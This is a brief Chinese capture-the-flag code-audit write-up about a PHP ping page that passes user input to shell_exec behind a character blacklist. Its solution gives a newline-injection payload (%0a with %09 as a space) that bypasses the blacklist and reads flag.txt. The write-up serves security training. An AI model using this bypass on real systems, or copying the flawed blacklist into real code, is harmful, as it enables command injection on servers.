【Code-Audit-Challenges】Challenge 6:命令执行、waf绕过

0x01 题目

 '',
        ';'  => '',
        '|' => '',
        '-'  => '',
        '$'  => '',
        '('  => '',
        ')'  => '',
        '`'  => '',
        '||' => '',
    );
    $target = str_replace( array_keys( $substitutions ), $substitutions, $target );
    $cmd = shell_exec( 'ping  -c 4 ' . $target );
        echo $target;
    echo  "
{$cmd}
"; } show_source(__FILE__);

0x02 解题

读代码了解到这题是一个绕过黑名单完成命令代码执行的题目。直接利用%0a来换行,%09当做空格就好了

paylod如下:

?ip=127.0.0.1%0acat%09flag.txt
【Code-Audit-Challenges】Challenge 6:命令执行、waf绕过_第1张图片

你可能感兴趣的:(【Code-Audit-Challenges】Challenge 6:命令执行、waf绕过)